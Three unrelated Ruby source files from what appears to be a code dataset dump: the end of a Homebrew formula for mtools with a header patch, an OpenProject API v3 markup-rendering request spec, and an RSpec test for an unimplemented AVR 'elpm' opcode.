conflicts_with "multimarkdown", because: "both install `mmd` binaries"
# 4.0.25 doesn't include the proper osx locale headers.
patch :DATA
def install
args = %W[
--disable-debug
--prefix=#{prefix}
--sysconfdir=#{etc}
--without-x
]
args << "LIBS=-liconv" if OS.mac?
# The mtools configure script incorrectly detects stat64. This forces it off
# to fix build errors on Apple Silicon. See stat(6) and pv.rb.
ENV["ac_cv_func_stat64"] = "no" if Hardware::CPU.arm?
system "./configure", *args
system "make"
ENV.deparallelize
system "make", "install"
end
test do
assert_match version.to_s, shell_output("#{bin}/mtools --version")
end
end
__END__
diff --git a/sysincludes.h b/sysincludes.h
index 056218e..ba3677b 100644
--- a/sysincludes.h
+++ b/sysincludes.h
@@ -279,6 +279,8 @@ extern int errno;
#include <pwd.h>
#endif
+#include <xlocale.h>
+#include <strings.h>
#ifdef HAVE_STRING_H
# include <string.h>
| 34.540984 | 123 | 0.740864 |
f8783a647a9463ebe0750ecf71f361523e6bc1b5 | 6,279 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
require 'rack/test'
describe 'API v3 Render resource', type: :request do
include Rack::Test::Methods
include API::V3::Utilities::PathHelper
let(:project) { FactoryGirl.create(:project, is_public: false) }
let(:work_package) { FactoryGirl.create(:work_package, project: project) }
let(:user) { FactoryGirl.create(:user, member_in_project: project) }
let(:content_type) { 'text/plain, charset=UTF-8' }
let(:path) { api_v3_paths.render_markup format: format, link: context }
let(:format) { nil }
let(:context) { nil }
before(:each) do
login_as(user)
post path, params, 'CONTENT_TYPE' => content_type
end
shared_examples_for 'valid response' do
it { expect(subject.status).to eq(200) }
it { expect(subject.content_type).to eq('text/html') }
it { expect(subject.body).to be_html_eql(text) }
end
describe 'textile' do
let(:format) { 'textile' }
describe '#post' do
subject(:response) { last_response }
describe 'response' do
describe 'valid' do
context 'w/o context' do
let(:params) do
'Hello World! This *is* textile with a ' +
'"link":http://community.openproject.org and ümläutß.'
end
it_behaves_like 'valid response' do
let(:text) do
'<p>Hello World! This <strong>is</strong> textile with a ' +
'<a href="http://community.openproject.org" class="external">link</a> ' +
'and ümläutß.</p>'
end
end
end
context 'with context' do
let(:params) { "Hello World! Have a look at ##{work_package.id}" }
let(:id) { work_package.id }
let(:href) { "/work_packages/#{id}" }
let(:title) { "#{work_package.subject} (#{work_package.status})" }
let(:text) {
'<p>Hello World! Have a look at <a '\
"class=\"issue work_package status-1 priority-1\" "\
"href=\"#{href}\" "\
"title=\"#{title}\">##{id}</a></p>"
}
context 'with work package context' do
let(:context) { api_v3_paths.work_package work_package.id }
it_behaves_like 'valid response'
end
context 'with project context' do
let(:context) { "/api/v3/projects/#{work_package.project_id}" }
it_behaves_like 'valid response'
end
end
end
describe 'invalid' do
context 'content type' do
let(:content_type) { 'application/json' }
let(:params) {
{ 'text' => "Hello World! Have a look at ##{work_package.id}" }.to_json
}
it_behaves_like 'unsupported content type',
I18n.t('api_v3.errors.invalid_content_type',
content_type: 'text/plain',
actual: 'application/json')
end
context 'with context' do
let(:params) { '' }
describe 'work package does not exist' do
let(:context) { api_v3_paths.work_package -1 }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.context_object_not_found')
end
describe 'work package not visible' do
let(:invisible_work_package) { FactoryGirl.create(:work_package) }
let(:context) { api_v3_paths.work_package invisible_work_package.id }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.context_object_not_found')
end
describe 'context does not exist' do
let(:context) { api_v3_paths.root }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.context_not_parsable')
end
describe 'unsupported context resource found' do
let(:context) { api_v3_paths.activity 2 }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.unsupported_context')
end
describe 'unsupported context version found' do
let(:context) { '/api/v4/work_packages/2' }
it_behaves_like 'invalid render context',
I18n.t('api_v3.errors.render.unsupported_context')
end
end
end
end
end
end
describe 'plain' do
describe '#post' do
let(:format) { 'plain' }
subject(:response) { last_response }
describe 'response' do
describe 'valid' do
let(:params) { "Hello *World*! Have a look at #1\n\nwith two lines." }
it_behaves_like 'valid response' do
let(:text) { "<p>Hello *World*! Have a look at #1</p>\n\n<p>with two lines.</p>" }
end
end
end
end
end
end
| 34.690608 | 94 | 0.587195 |
91019e888715ed5f8012fd3989a9559141d9fd8d | 380 | # typed: false
require "shared_examples_for_opcode"
RSpec.describe(AVR::Opcode) do
describe "elpm" do
include_examples "opcode", :elpm
it "is not implemented" do
expect do
cpu.instruction(:elpm, cpu.r0, AVR::RegisterWithModification.new(cpu.Z, :post_increment)).execute
end.to(raise_error(AVR::Opcode::OpcodeNotImplementedError))
end
end
end
| 25.333333 | 105 | 0.715789 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.